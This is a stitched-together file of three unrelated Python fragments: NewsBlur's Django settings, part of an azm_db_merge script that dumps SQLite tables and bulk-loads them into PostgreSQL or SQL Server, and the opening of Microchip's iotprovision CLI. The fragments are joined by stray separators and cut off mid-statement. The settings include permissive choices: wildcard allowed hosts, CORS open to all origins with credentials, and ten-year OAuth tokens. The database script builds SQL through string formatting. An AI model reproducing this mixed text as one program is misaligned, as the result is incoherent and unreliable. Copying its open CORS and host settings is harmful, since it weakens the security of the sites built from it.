MEDIA_ROOT = os.path.join(CURRENT_DIR, 'media')
STATIC_ROOT = os.path.join(CURRENT_DIR, 'static')
UTILS_ROOT = os.path.join(CURRENT_DIR, 'utils')
VENDOR_ROOT = os.path.join(CURRENT_DIR, 'vendor')
LOG_FILE = os.path.join(CURRENT_DIR, 'logs/newsblur.log')
IMAGE_MASK = os.path.join(CURRENT_DIR, 'media/img/mask.png')
# ==============
# = PYTHONPATH =
# ==============
if '/utils' not in ' '.join(sys.path):
sys.path.append(UTILS_ROOT)
if '/vendor' not in ' '.join(sys.path):
sys.path.append(VENDOR_ROOT)
import logging
import datetime
import redis
import raven
import django.http
import re
from mongoengine import connect
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from utils import jammit
# ===================
# = Server Settings =
# ===================
ADMINS = (
('<NAME>', '<EMAIL>'),
)
SERVER_NAME = 'newsblur'
SERVER_EMAIL = '<EMAIL>'
HELLO_EMAIL = '<EMAIL>'
NEWSBLUR_URL = 'http://www.newsblur.com'
IMAGES_URL = 'https://imageproxy.newsblur.com'
SECRET_KEY = 'YOUR_SECRET_KEY'
IMAGES_SECRET_KEY = "YOUR_SECRET_IMAGE_KEY"
# ===================
# = Global Settings =
# ===================
DEBUG = False
TEST_DEBUG = False
SEND_BROKEN_LINK_EMAILS = False
DEBUG_QUERIES = False
MANAGERS = ADMINS
PAYPAL_RECEIVER_EMAIL = '<EMAIL>'
TIME_ZONE = 'GMT'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/account/login'
MEDIA_URL = '/media/'
STATIC_URL = '/media/'
STATIC_ROOT = '/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
CIPHER_USERNAMES = False
DEBUG_ASSETS = DEBUG
HOMEPAGE_USERNAME = 'popular'
ALLOWED_HOSTS = ['*']
AUTO_PREMIUM_NEW_USERS = False
AUTO_ENABLE_NEW_USERS = True
ENFORCE_SIGNUP_CAPTCHA = True
PAYPAL_TEST = False
# Uncomment below to force all feeds to store this many stories. Default is to cut
# off at 25 stories for single subscriber non-premium feeds and 500 for popular feeds.
# OVERRIDE_STORY_COUNT_MAX = 1000
# ===========================
# = Django-specific Modules =
# ===========================
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.media",
'django.core.context_processors.request',
)
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'apps.profile.middleware.TimingMiddleware',
'apps.profile.middleware.LastSeenMiddleware',
'apps.profile.middleware.UserAgentBanMiddleware',
'subdomains.middleware.SubdomainMiddleware',
'corsheaders.middleware.CorsMiddleware',
'apps.profile.middleware.SimpsonsMiddleware',
'apps.profile.middleware.ServerHostnameMiddleware',
'oauth2_provider.middleware.OAuth2TokenMiddleware',
# 'debug_toolbar.middleware.DebugToolbarMiddleware',
'apps.profile.middleware.DBProfilerMiddleware',
'apps.profile.middleware.SQLLogToConsoleMiddleware',
'utils.mongo_raw_log_middleware.MongoDumpMiddleware',
'utils.redis_raw_log_middleware.RedisDumpMiddleware',
)
AUTHENTICATION_BACKENDS = (
'oauth2_provider.backends.OAuth2Backend',
'django.contrib.auth.backends.ModelBackend',
)
CORS_ORIGIN_ALLOW_ALL = True
# CORS_ORIGIN_REGEX_WHITELIST = ('^(https?://)?(\w+\.)?newsblur\.com$', )
CORS_ALLOW_CREDENTIALS = True
OAUTH2_PROVIDER = {
'SCOPES': {
'read': 'View new unread stories, saved stories, and shared stories.',
'write': 'Create new saved stories, shared stories, and subscriptions.',
'ifttt': 'Pair your NewsBlur account with other services.',
},
'CLIENT_ID_GENERATOR_CLASS': 'oauth2_provider.generators.ClientIdGenerator',
'ACCESS_TOKEN_EXPIRE_SECONDS': 60*60*24*365*10, # 10 years
'AUTHORIZATION_CODE_EXPIRE_SECONDS': 60*60, # 1 hour
}
# ===========
# = Logging =
# ===========
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '[%(asctime)-12s] %(message)s',
'datefmt': '%b %d %H:%M:%S'
},
'simple': {
'format': '%(message)s'
},
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'pyes':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'vendor.apns':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'log_file':{
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': LOG_FILE,
'maxBytes': '16777216', # 16megabytes
'formatter': 'verbose'
},
'mail_admins': {
'level': 'CRITICAL',
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
'include_html': True,
},
# 'sentry': {
# 'level': 'ERROR',
# 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler'
# },
},
'loggers': {
'django.request': {
'handlers': ['console', 'log_file'],
'level': 'ERROR',
'propagate': True,
},
'django.db.backends': {
'handlers': ['null'],
'level': 'DEBUG',
'propagate': False,
},
'django.security.DisallowedHost': {
'handlers': ['null'],
'propagate': False,
},
'newsblur': {
'handlers': ['console', 'log_file'],
'level': 'DEBUG',
'propagate': False,
},
'readability': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'pyes': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'apps': {
'handlers': ['log_file'],
'level': 'INFO',
'propagate': True,
},
# 'raven': {
# 'level': 'DEBUG',
# 'handlers': ['console'],
# 'propagate': False,
# },
# 'sentry.errors': {
# 'level': 'DEBUG',
# 'handlers': ['console'],
# 'propagate': False,
# },
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
}
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
# ==========================
# = Miscellaneous Settings =
# ==========================
DAYS_OF_UNREAD = 30
DAYS_OF_UNREAD_FREE = 14
# DoSH can be more, since you can up this value by N, and after N days,
# you can then up the DAYS_OF_UNREAD value with no impact.
DAYS_OF_STORY_HASHES = 30
SUBSCRIBER_EXPIRE = 7
AUTH_PROFILE_MODULE = 'newsblur.UserProfile'
TEST_DATABASE_COLLATION = 'utf8_general_ci'
TEST_DATABASE_NAME = 'newsblur_test'
ROOT_URLCONF = 'urls'
INTERNAL_IPS = ('127.0.0.1',)
LOGGING_LOG_SQL = True
APPEND_SLASH = False
SOUTH_TESTS_MIGRATE = False
SESSION_ENGINE = 'redis_sessions.session'
TEST_RUNNER = "utils.testrunner.TestRunner"
SESSION_COOKIE_NAME = 'newsblur_sessionid'
SESSION_COOKIE_AGE = 60*60*24*365 # 1 year
SESSION_COOKIE_DOMAIN = '.newsblur.com'
SENTRY_DSN = 'https://[email protected]/99999999'
if DEBUG:
# EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_BACKEND = 'vendor.mailgun.MailgunBackend'
else:
EMAIL_BACKEND = 'vendor.mailgun.MailgunBackend'
# ==============
# = Subdomains =
# ==============
SUBDOMAIN_URLCONFS = {
None: 'urls',
'www': 'urls',
}
REMOVE_WWW_FROM_DOMAIN = True
# ===========
# = Logging =
# ===========
LOG_LEVEL = logging.DEBUG
LOG_TO_STREAM = False
# ===============
# = Django Apps =
# ===============
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.admin',
'django_extensions',
'djcelery',
# 'kombu.transport.django',
'vendor.paypal.standard.ipn',
'apps.rss_feeds',
'apps.reader',
'apps.analyzer',
'apps.feed_import',
'apps.profile',
'apps.recommendations',
'apps.statistics',
'apps.notifications',
'apps.static',
'apps.mobile',
'apps.push',
'apps.social',
'apps.oauth',
'apps.search',
'apps.categories',
'south',
'utils',
'vendor',
'vendor.typogrify',
'vendor.zebra',
'oauth2_provider',
'corsheaders',
)
# ==========
# = Stripe =
# ==========
STRIPE_SECRET = "YOUR-SECRET-API-KEY"
STRIPE_PUBLISHABLE = "YOUR-PUBLISHABLE-API-KEY"
ZEBRA_ENABLE_APP = True
# ==========
# = Celery =
# ==========
import djcelery
djcelery.setup_loader()
# from celery import Celery
# celeryapp = Celery()
# celeryapp.config_from_object('django.conf:settings')
CELERY_ROUTES = {
"work-queue": {
"queue": "work_queue",
"binding_key": "work_queue"
},
"new-feeds": {
"queue": "new_feeds",
"binding_key": "new_feeds"
},
"push-feeds": {
"queue": "push_feeds",
"binding_key": "push_feeds"
},
"update-feeds": {
"queue": "update_feeds",
"binding_key": "update_feeds"
},
"beat-tasks": {
"queue": "beat_tasks",
"binding_key": "beat_tasks"
},
"search-indexer": {
"queue": "search_indexer",
"binding_key": "search_indexer"
},
"search-indexer-tasker": {
"queue": "search_indexer_tasker",
"binding_key": "search_indexer_tasker"
},
}
CELERY_QUEUES = {
"work_queue": {
"exchange": "work_queue",
"exchange_type": "direct",
"binding_key": "work_queue",
},
"new_feeds": {
"exchange": "new_feeds",
"exchange_type": "direct",
"binding_key": "new_feeds"
},
"push_feeds": {
"exchange": "push_feeds",
"exchange_type": "direct",
"binding_key": "push_feeds"
},
"update_feeds": {
"exchange": "update_feeds",
"exchange_type": "direct",
"binding_key": "update_feeds"
},
"beat_tasks": {
"exchange": "beat_tasks",
"exchange_type": "direct",
"binding_key": "beat_tasks"
},
"beat_feeds_task": {
"exchange": "beat_feeds_task",
"exchange_type": "direct",
"binding_key": "beat_feeds_task"
},
"search_indexer": {
"exchange": "search_indexer",
"exchange_type": "direct",
"binding_key": "search_indexer"
},
"search_indexer_tasker": {
"exchange": "search_indexer_tasker",
"exchange_type": "direct",
"binding_key": "search_indexer_tasker"
},
}
CELERY_DEFAULT_QUEUE = "work_queue"
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_IMPORTS = ("apps.rss_feeds.tasks",
"apps.social.tasks",
"apps.reader.tasks",
"apps.profile.tasks",
"apps.feed_import.tasks",
"apps.search.tasks",
"apps.statistics.tasks",)
CELERYD_CONCURRENCY = 4
CELERY_IGNORE_RESULT = True
CELERY_ACKS_LATE = True # Retry if task fails
CELERYD_MAX_TASKS_PER_CHILD = 10
CELERYD_TASK_TIME_LIMIT = 12 * 30
CELERY_DISABLE_RATE_LIMITS = True
SECONDS_TO_DELAY_CELERY_EMAILS = 60
CELERYBEAT_SCHEDULE = {
'task-feeds': {
'task': 'task-feeds',
'schedule': datetime.timedelta(minutes=1),
'options': {'queue': 'beat_feeds_task'},
},
'task-broken-feeds': {
'task': 'task-broken-feeds',
'schedule': datetime.timedelta(hours=6),
'options': {'queue': 'beat_feeds_task'},
},
'freshen-homepage': {
'task': 'freshen-homepage',
'schedule': datetime.timedelta(hours=1),
'options': {'queue': 'beat_tasks'},
},
'collect-stats': {
'task': 'collect-stats',
'schedule': datetime.timedelta(minutes=1),
'options': {'queue': 'beat_tasks'},
},
'collect-feedback': {
'task': 'collect-feedback',
'schedule': datetime.timedelta(minutes=1),
'options': {'queue': 'beat_tasks'},
},
'share-popular-stories': {
'task': 'share-popular-stories',
'schedule': datetime.timedelta(minutes=10),
'options': {'queue': 'beat_tasks'},
},
'clean-analytics': {
'task': 'clean-analytics',
'schedule': datetime.timedelta(hours=12),
'options': {'queue': 'beat_tasks', 'timeout': 720*10},
},
'reimport-stripe-history': {
'task': 'reimport-stripe-history',
'schedule': datetime.timedelta(hours=6),
'options': {'queue': 'beat_tasks'},
},
'clean-spam': {
'task': 'clean-spam',
'schedule': datetime.timedelta(hours=1),
'options': {'queue': 'beat_tasks'},
},
'clean-social-spam': {
'task': 'clean-social-spam',
'schedule': datetime.timedelta(hours=6),
'options': {'queue': 'beat_tasks'},
},
'premium-expire': {
'task': 'premium-expire',
'schedule': datetime.timedelta(hours=24),
'options': {'queue': 'beat_tasks'},
},
'activate-next-new-user': {
'task': 'activate-next-new-user',
'schedule': datetime.timedelta(minutes=5),
'options': {'queue': 'beat_tasks'},
},
}
# =========
# = Mongo =
# =========
MONGO_DB = {
'host': 'db_mongo:27017',
'name': 'newsblur',
}
MONGO_ANALYTICS_DB = {
'host': 'db_mongo_analytics:27017',
'name': 'nbanalytics',
}
# ====================
# = Database Routers =
# ====================
class MasterSlaveRouter(object):
"""A router that sets up a simple master/slave configuration"""
def db_for_read(self, model, **hints):
"Point all read operations to a random slave"
return 'slave'
def db_for_write(self, model, **hints):
"Point all write operations to the master"
return 'default'
def allow_relation(self, obj1, obj2, **hints):
"Allow any relation between two objects in the db pool"
db_list = ('slave','default')
if obj1._state.db in db_list and obj2._state.db in db_list:
return True
return None
def allow_syncdb(self, db, model):
"Explicitly put all models on all databases."
return True
# =========
# = Redis =
# =========
REDIS = {
'host': 'db_redis',
}
REDIS_PUBSUB = {
'host': 'db_redis_pubsub',
}
REDIS_STORY = {
'host': 'db_redis_story',
}
REDIS_SESSIONS = {
'host': 'db_redis_sessions',
}
CELERY_REDIS_DB_NUM = 4
SESSION_REDIS_DB = 5
# =================
# = Elasticsearch =
# =================
ELASTICSEARCH_FEED_HOSTS = ['db_search_feed:9200']
ELASTICSEARCH_STORY_HOSTS = ['db_search_story:9200']
# ===============
# = Social APIs =
# ===============
FACEBOOK_APP_ID = '111111111111111'
FACEBOOK_SECRET = '99999999999999999999999999999999'
FACEBOOK_NAMESPACE = 'newsblur'
TWITTER_CONSUMER_KEY = 'ooooooooooooooooooooo'
TWITTER_CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
YOUTUBE_API_KEY = "<KEY>"
# ===============
# = AWS Backing =
# ===============
ORIGINAL_PAGE_SERVER = "db_pages:3060"
BACKED_BY_AWS = {
'pages_on_s3': False,
'icons_on_s3': False,
}
PROXY_S3_PAGES = True
S3_BACKUP_BUCKET = 'newsblur_backups'
S3_PAGES_BUCKET_NAME = 'pages.newsblur.com'
S3_ICONS_BUCKET_NAME = 'icons.newsblur.com'
S3_AVATARS_BUCKET_NAME = 'avatars.newsblur.com'
# ==================
# = Configurations =
# ==================
from local_settings import *
if not DEBUG:
INSTALLED_APPS += (
'raven.contrib.django',
'django_ses',
)
# RAVEN_CLIENT = raven.Client(dsn=SENTRY_DSN, release=raven.fetch_git_sha(os.path.dirname(__file__)))
RAVEN_CLIENT = raven.Client(SENTRY_DSN)
COMPRESS = not DEBUG
TEMPLATE_DEBUG = DEBUG
ACCOUNT_ACTIVATION_DAYS = 30
AWS_ACCESS_KEY_ID = S3_ACCESS_KEY
AWS_SECRET_ACCESS_KEY = S3_SECRET
os.environ["AWS_ACCESS_KEY_ID"] = AWS_ACCESS_KEY_ID
os.environ["AWS_SECRET_ACCESS_KEY"] = AWS_SECRET_ACCESS_KEY
def custom_show_toolbar(request):
return DEBUG
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': True,
'SHOW_TOOLBAR_CALLBACK': custom_show_toolbar,
'HIDE_DJANGO_SQL': False,
}
if DEBUG:
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
else:
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
# =========
# = Mongo =
# =========
MONGO_DB_DEFAULTS = {
'name': 'newsblur',
'host': 'db_mongo:27017',
'alias': 'default',
}
MONGO_DB = dict(MONGO_DB_DEFAULTS, **MONGO_DB)
# MONGO_URI = 'mongodb://%s' % (MONGO_DB.pop('host'),)
# if MONGO_DB.get('read_preference', pymongo.ReadPreference.PRIMARY) != pymongo.ReadPreference.PRIMARY:
# MONGO_PRIMARY_DB = MONGO_DB.copy()
# MONGO_PRIMARY_DB.update(read_preference=pymongo.ReadPreference.PRIMARY)
# MONGOPRIMARYDB = connect(MONGO_PRIMARY_DB.pop('name'), **MONGO_PRIMARY_DB)
# else:
# MONGOPRIMARYDB = MONGODB
# MONGODB = connect(MONGO_DB.pop('name'), host=MONGO_URI, **MONGO_DB)
MONGODB = connect(MONGO_DB.pop('name'), **MONGO_DB)
# MONGODB = connect(host="mongodb://localhost:27017/newsblur", connect=False)
MONGO_ANALYTICS_DB_DEFAULTS = {
'name': 'nbanalytics',
'host': 'db_mongo_analytics:27017',
'alias': 'nbanalytics',
}
MONGO_ANALYTICS_DB = dict(MONGO_ANALYTICS_DB_DEFAULTS, **MONGO_ANALYTICS_DB)
# MONGO_ANALYTICS_URI = 'mongodb://%s' % (MONGO_ANALYTICS_DB.pop('host'),)
# MONGOANALYTICSDB = connect(MONGO_ANALYTICS_DB.pop('name'), host=MONGO_ANALYTICS_URI, **MONGO_ANALYTICS_DB)
MONGOANALYTICSDB = connect(MONGO_ANALYTICS_DB.pop('name'), **MONGO_ANALYTICS_DB)
# =========
# = Redis =
# =========
BROKER_BACKEND = "redis"
BROKER_URL = "redis://%s:6379/%s" % (REDIS['host'], CELERY_REDIS_DB_NUM)
CELERY_RESULT_BACKEND = BROKER_URL
SESSION_REDIS_HOST = REDIS_SESSIONS['host']
SESSION_REDIS_RETRY_ON_TIMEOUT = True
SESSION_REDIS_SOCKET_TIMEOUT = 10
CACHES = {
'default': | |
psql to do first manually if log was already imported using older azm_db_merge:
# alter table all_logs.lte_volte_rtp_msg alter column lte_volte_rtp_source_ssrc type bigint;
# alter table all_logs.lte_volte_rtp_msg alter column lte_volte_rtp_timestamp type bigint;
col_type = "bigint"
#######################
is_already_in_table = col_name in remote_column_names
dprint("local_col_name: " + col_name +
" col_type: " + col_type +
" - is_already_in_table: "+str(is_already_in_table))
if (not is_already_in_table):
local_columns_not_in_remote.append(
' "{}" {}'.format(col_name, col_type))
# TODO: handle if different type?
n_cols_to_add = len(local_columns_not_in_remote)
if (n_cols_to_add == 0):
dprint("n_cols_to_add == 0 - no need to alter table")
else:
print "n_cols_to_add: " + str(n_cols_to_add) + " - need to alter table - add cols:" + str(local_columns_not_in_remote) + "\nremote_cols:\n"+str(remote_columns)
# example: ALTER TABLE dbo.doc_exa ADD column_b VARCHAR(20) NULL, column_c INT NULL ;
alter_str = "ALTER TABLE \"{}\" ".format(table_name)
alter_cols = ""
for new_col in local_columns_not_in_remote:
# not first
prefix = ""
if (alter_cols != ""):
prefix = ", "
alter_cols = alter_cols + prefix + " ADD " + new_col
alter_str = alter_str + alter_cols + ";"
sqlstr = sql_adj_line(alter_str)
print "execute alter_str: " + sqlstr
exec_creatept_or_alter_handle_concurrency(sqlstr)
# re-get remote cols
remote_columns = get_remote_columns(args, table_name)
remote_column_names = get_col_names(remote_columns)
print("get_remote_columns after alter: "+str(remote_column_names))
else:
raise Exception("FATAL: create table error - : \nemsg:\n "+emsg+" \nsqlstr:\n"+sqlstr)
if g_bulk_insert_mode:
if args['pg10_partition_by_month']:
if table_name == "logs":
# dont partition logs table
pass
else:
log_hash = args['log_hash']
## check/create partitions for month for log_hash, prev month, after month
ori_log_hash_datetime = datetime.datetime.fromtimestamp(log_hash & 0xffffffff) # log_hash lower 32 bits is the timestamp
months_pt_check_list = [ori_log_hash_datetime+relativedelta(months=-1), ori_log_hash_datetime, ori_log_hash_datetime+relativedelta(months=+1)]
for log_hash_datetime in months_pt_check_list:
log_hash_ym_str = log_hash_datetime.strftime('%Y_%m')
print "log_hash_datetime:", log_hash_datetime
ntn = "logs_{}".format(log_hash_ym_str) # simpler name because we got cases where schema's table name got truncated: activate_dedicated_eps_bearer_context_request_params_3170932708
pltn = "{}.{}".format(schema_per_month_name, ntn)
per_month_table_already_exists = False
with g_conn as c:
check_sql = "select * from information_schema.tables where table_schema='{}' and table_name='{}'".format(schema_per_month_name, ntn)
print "check_sql:", check_sql
g_cursor.execute(check_sql)
if bool(g_cursor.rowcount):
per_month_table_already_exists = True
if per_month_table_already_exists:
print "omit create already existing per_month table:", pltn
else:
print "NOT omit create already existing per_month table:", pltn
cre_target_pt_sql = "CREATE TABLE {} PARTITION OF {} FOR VALUES from ('{}-1') to ('{}-1');".format(
pltn,
table_name,
log_hash_datetime.strftime("%Y-%m"),
(log_hash_datetime+relativedelta(months=+1)).strftime("%Y-%m")
)
if args['pg10_partition_index_log_hash']:
cre_index_for_pt_sql = "CREATE INDEX ON {} (log_hash);".format(pltn)
cre_target_pt_sql += " "+cre_index_for_pt_sql
print("cre_target_pt_sql:", cre_target_pt_sql)
exec_creatept_or_alter_handle_concurrency(cre_target_pt_sql, allow_exstr_list=[" already exists"])
###### let sqlite3 dump contents of table into file
table_dump_fp = os.path.join(g_dir_processing_azm, table_name + ".csv")
table_dump_format_fp = os.path.join(g_dir_processing_azm, table_name + ".fmt")
#print("table_dump_fp: "+table_dump_fp)
#print("table_dump_format_fp: "+table_dump_format_fp)
# create dump csv of that table
"""
example dump of logs table:
sqlite3 azqdata.db -list -newline "|" -separator "," ".out c:\\azq\\azq_report_gen\\azm_db_merge\\logs.csv" "select * from logs"
"""
# get col list, and hex(col) for blob coulumns
geom_col_index = -1
i = 0
col_select = ""
first = True
dprint("local_columns: "+str(local_columns))
for col in local_columns:
col_name = col[0]
col_type = col[1]
if first:
first = False
else:
col_select = col_select + ","
pre = " "
post = ""
if col_type == "geometry" or (g_is_postgre and col_type == "bytea") or (g_is_ms and col_type.startswith("varbinary")):
pre = " hex("
post = ")"
if col_name == "geom":
geom_col_index = i
col_select = col_select + pre + col_name + post
i = i + 1
dprint("col_select: "+col_select)
if g_is_ms:
ret = call(
[
args['sqlite3_executable'],
args['file'],
"-ascii",
"-list",
'-separator', azm_db_constants.BULK_INSERT_COL_SEPARATOR_VALUE,
'-newline', azm_db_constants.BULK_INSERT_LINE_SEPARATOR_VALUE,
'.out ' + '"' +table_dump_fp.replace("\\","\\\\") + '"', # double backslash because it needs to go inside sqlite3 cmd parsing again
'select '+col_select+' from '+ table_name
], shell = False
)
if g_is_postgre:
dump_cmd = [
args['sqlite3_executable'],
args['file'],
"-ascii",
"-csv",
'-separator',',',
'-newline', '\n',
'.out ' + '"' +table_dump_fp.replace("\\","\\\\") + '"', # double backslash because it needs to go inside sqlite3 cmd parsing again
'select '+col_select+' from '+ table_name
]
dprint("dump_cmd:", dump_cmd)
ret = call(
dump_cmd,
shell=False
)
table_dump_fp_adj = table_dump_fp + "_adj.csv"
# dont add lines where all cols are null - bug in older azm files causing COPY to fail...
all_cols_null_line = ""
for ci in range(len(local_columns)):
if ci != 0:
all_cols_null_line += ","
print "all_cols_null_line:", all_cols_null_line
pd_csvadj_success = False
# trying preliminary version (without geom conv yet) of pandas proved that it was slower than python file looping and also failing at events table so disable for now....
"""
if g_is_postgre:
# try use pandas to adjust csv instead of looping through file...
try:
import pandas as pd
df = pd.read_csv(table_dump_fp, header=None, names=local_column_names)
print "df.columns:", df.columns
print "pd table_dump_fp df len:", len(df)
df.geom = None
df = df.dropna(how='all')
df.to_csv(table_dump_fp_adj, header=None)
pd_csvadj_success = True
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print "pd_csvadj exception:", exstr
print "pd_csvadj_success:", pd_csvadj_success
"""
if not pd_csvadj_success:
with open(table_dump_fp,"rb") as of:
with open(table_dump_fp_adj,"wb") as nf: # wb required for windows so that \n is 0x0A - otherwise \n will be 0x0D 0x0A and doest go with our fmt file and only 1 row will be inserted per table csv in bulk inserts...
while True:
ofl = of.readline()
if g_is_postgre:
ofl = ofl.replace(',""',',')
""" no need to check this, only old stale thread versions would have these cases and will have other cases too so let it crash in all those cases
if ofl.strip() == all_cols_null_line:
continue
"""
ofl = find_and_conv_spatialite_blob_to_wkb(ofl)
if ofl == "":
break
nf.write(ofl)
table_dump_fp = table_dump_fp_adj
dprint("dump table: "+table_name+" for bulk insert ret: "+str(ret))
if (ret != 0):
print "WARNING: dump table: "+table_name+" for bulk insert failed - likely sqlite db file error like: database disk image is malformed. In many cases, data is still correct/complete so continue."
if (os.stat(table_dump_fp).st_size == 0):
print "this table is empty..."
return True
# if control reaches here then the table is not empty
if g_is_ms and is_contains_geom_col:
# add this table:geom to 'geometry_columns' (table_name was set to UNIQUE so it will fail if already exists...
""" somehow not working - let QGIS detect automatically itself for now...
try:
insert_geomcol_sqlstr = "INSERT INTO \"geometry_columns\" VALUES('azq','dbo','{}','geom',NULL,4326,'POINT');".format(table_name)
dprint("insert_geomcol_sqlstr: "+insert_geomcol_sqlstr)
ret = g_cursor.execute(insert_geomcol_sqlstr)
print "insert this table:geom into geometry_columns done"
except Exception as e:
estr = str(e)
dprint("insert this table:geom into geometry_columns exception: "+estr)
pass
"""
# create fmt format file for that table
"""
generate format file:
https://msdn.microsoft.com/en-us/library/ms178129.aspx
format file contents:
https://msdn.microsoft.com/en-us/library/ms191479(v=sql.110).aspx
"""
n_local_cols = len(local_column_names)
fmt = open(table_dump_format_fp,"w")
fmt.write("11.0\n") # ver - 11.0 = SQL Server 2012
fmt.write(str(n_local_cols)+"\n") # n cols
host_field_order = 0 # dyn gen - first inc wil get it to 1
host_file_data_type = "SQLCHAR"
prefix_length = 0
host_file_data_length = 0 # When a delimited text file having a prefix length of 0 and a terminator is imported, the field-length value is ignored, because the storage space used by the field equals the length of the data plus the terminator
terminator = None # dyn gen
server_col_order = None # dyn gen
server_col_name = None # dyn gen
col_coalition = ""
for col in local_column_names:
host_field_order = host_field_order + 1
if (n_local_cols == host_field_order): #last
terminator = azm_db_constants.BULK_INSERT_LINE_SEPARATOR_PARAM
else:
terminator = azm_db_constants.BULK_INSERT_COL_SEPARATOR_PARAM
if not table_name.startswith("wifi_scanned"):
dprint("remote_column_names: "+str(remote_column_names))
pass
dprint("col: "+str(col))
server_col_order = remote_column_names.index(col) + 1 # not 0 based
server_col_name = col # always same col name
fmt.write(
'{}\t{}\t{}\t{}\t"{}"\t{}\t"{}"\t"{}"\n'.format(
host_field_order,
host_file_data_type,
prefix_length,
host_file_data_length,
terminator,
server_col_order,
server_col_name,
col_coalition
)
)
fmt.flush()
fmt.close()
# both dump csv and format fmt files are ready
# execute bulk insert sql now
if g_is_ms:
sqlstr = "bulk insert \"{}\" from '{}' with ( formatfile = '{}' );".format(
table_name,
table_dump_fp,
table_dump_format_fp
)
if g_is_postgre:
colnames = ""
first = True
for col in local_column_names:
if not first:
colnames = colnames + ","
if first:
first = False
colnames = colnames + '"' + col + '"'
sqlstr = "copy \"{}\" ({}) from STDIN with | |
<reponame>microchip-pic-avr-tools/iotprovision
#!/usr/bin/env python3
"""
This script can do one or more (default: all) of the following steps:
- Generate root and signer certificates, register with AWS (certs)
- Update the kit's debugger firmware to latest version
- Provision a connected IoT kit (provision)
- Program WINC AWS parameters needed by demo app
- Program kit with a demo/application (application)
- Optionally set up WiFi credentials in demo application
"""
# (see # https://confluence.microchip.com/display/XP/Provisioning+current+state+and+improvements)
import time
import argparse
import os
import sys
import logging
from logging.config import dictConfig
import yaml
from appdirs import user_log_dir
from yaml.scanner import ScannerError
from pytrustplatform.ca_create import DEFAULT_ORGANIZATION_NAME, DEFAULT_ROOT_COMMON_NAME, DEFAULT_SIGNER_COMMON_NAME
from .iotprovision_main import iotprovision, STATUS_SUCCESS, STATUS_FAILURE
from .provisioner import WIFI_AUTHS #FIXME
from .cellular.cellularprovisioner import DEFAULT_CELLULAR_PROVIDER, CELLULAR_VALID_FREQ_BANDS
from .cellular.sequans_ciphersuites import DEFAULT_CIPHERSUITES, print_ciphersuites
from .deprecated import deprecated
# Supported cloud providers
CLOUD_PROVIDERS = ["google", "aws", "azure"]
ROOTCERTS_HELP = """
Action 'rootcerts' is used to manage root certificate storage in WINC flash.
It requires --install-root-certs or --restore-root-certs options:
--irc ROOT_CERTS_FOLDER, --install-root-certs ROOT_CERTS_FOLDER
Install all certificate files in a folder in
WINC root certificate sector
--rrc {backup,factory}, --restore-root-certs {backup,factory}
Restore WINC root certificates sector from backup or
factory defaults
When one of the above options are used, the previous root certificates sector
content will be saved to a backup file. Separate backup file is maintained
for each kit.
Usage examples:
# Install all certificate files in 'my_certs_folder' in WINC root cert sector:
iotprovision --install-root-certs my_certs_folder
# Restore previous content of WINC certificates sector from backup:
iotprovision --restore-root-certs backup
# Restore WINC root certificates sector to factory defaults:
iotprovision --restore-root-certs factory
"""
def setup_logging(user_requested_level=logging.WARNING, default_path='logging.yaml',
env_key='MICROCHIP_PYTHONTOOLS_CONFIG'):
"""
Setup logging configuration for this CLI
"""
# Logging config YAML file can be specified via environment variable
value = os.getenv(env_key, None)
if value:
path = value
else:
# Otherwise use the one shipped with this application
path = os.path.join(os.path.dirname(__file__), default_path)
# Load the YAML if possible
if os.path.exists(path):
try:
with open(path, 'rt') as file:
# Load logging configfile from yaml
configfile = yaml.safe_load(file)
# File logging goes to user log directory under Microchip/modulename
logdir = user_log_dir(__name__, "Microchip")
# Look through all handlers, and prepend log directory to redirect all file loggers
num_file_handlers = 0
for handler in configfile['handlers'].keys():
# A filename key
if 'filename' in configfile['handlers'][handler].keys():
configfile['handlers'][handler]['filename'] = os.path.join(
logdir, configfile['handlers'][handler]['filename'])
num_file_handlers += 1
if num_file_handlers > 0:
# Create it if it does not exist
os.makedirs(logdir, exist_ok=True)
if user_requested_level <= logging.DEBUG:
# Using a different handler for DEBUG level logging to be able to have a more detailed formatter
configfile['root']['handlers'].append('console_detailed')
# Remove the original console handlers
try:
configfile['root']['handlers'].remove('console_only_info')
except ValueError:
